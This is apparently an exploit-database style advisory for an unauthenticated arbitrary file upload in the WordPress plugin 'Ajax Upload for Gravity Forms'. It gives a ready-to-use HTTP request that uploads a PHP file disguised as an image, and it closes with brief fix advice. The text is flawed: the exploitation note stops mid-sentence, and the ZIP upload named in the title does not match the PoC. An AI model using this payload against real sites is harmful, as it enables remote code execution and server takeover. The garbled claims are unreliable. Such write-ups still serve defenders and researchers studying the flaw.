################################################################################ # Exploit Title: WordPress Plugin Ajax Upload for Gravity Forms - Arbitrary File Upload (ZIP) # Date: 2026-02-05 # Exploit Author: UnM@SK # Vendor Homepage: https://github.com/WPPlugins/ajax-upload-for-gravity-forms # Category: Webapps # Vulnerability Type: [CWE-434] Unrestricted Upload of File with Dangerous Type ################################################################################ [+] Description: The "Ajax Upload for Gravity Forms" plugin for WordPress fails to validate file extensions properly in its AJAX handler. This allow unauthenticated attackers to upload arbitrary files, including .zip files containing malicious scripts. This can lead to Remote Code Execution (RCE) and full server compromise. [+] Proof of Concept (PoC): POST /wp-admin/admin-ajax.php?action=itsg_ajaxupload_upload_file HTTP/2 Host: [TARGET_HOST] Content-Type: multipart/form-data; boundary=---------------------------18990914928282 -----------------------------18990914928282 Content-Disposition: form-data; name="files[]"; filename="exp.php.jpg" Content-Type: image/jpeg <?php phpinfo();?> -----------------------------18990914928282-- [+] Exploitation Note: The application accepts the file because it only checks the initial magic bytes or ignores the extension check entirely when sent via the 'itsg_ajaxupload_upload_file' action. Attackers can bundle a [+] Impact: - Arbitrary File Upload. [+] Recommendations: - Disable the plugin if not in use. - Sanitize the 'files[]' array on the server side to only allow specific image extensions. - Use 'wp_handle_upload()' or similar WordPress core functions that provide built-in security checks. ################################################################################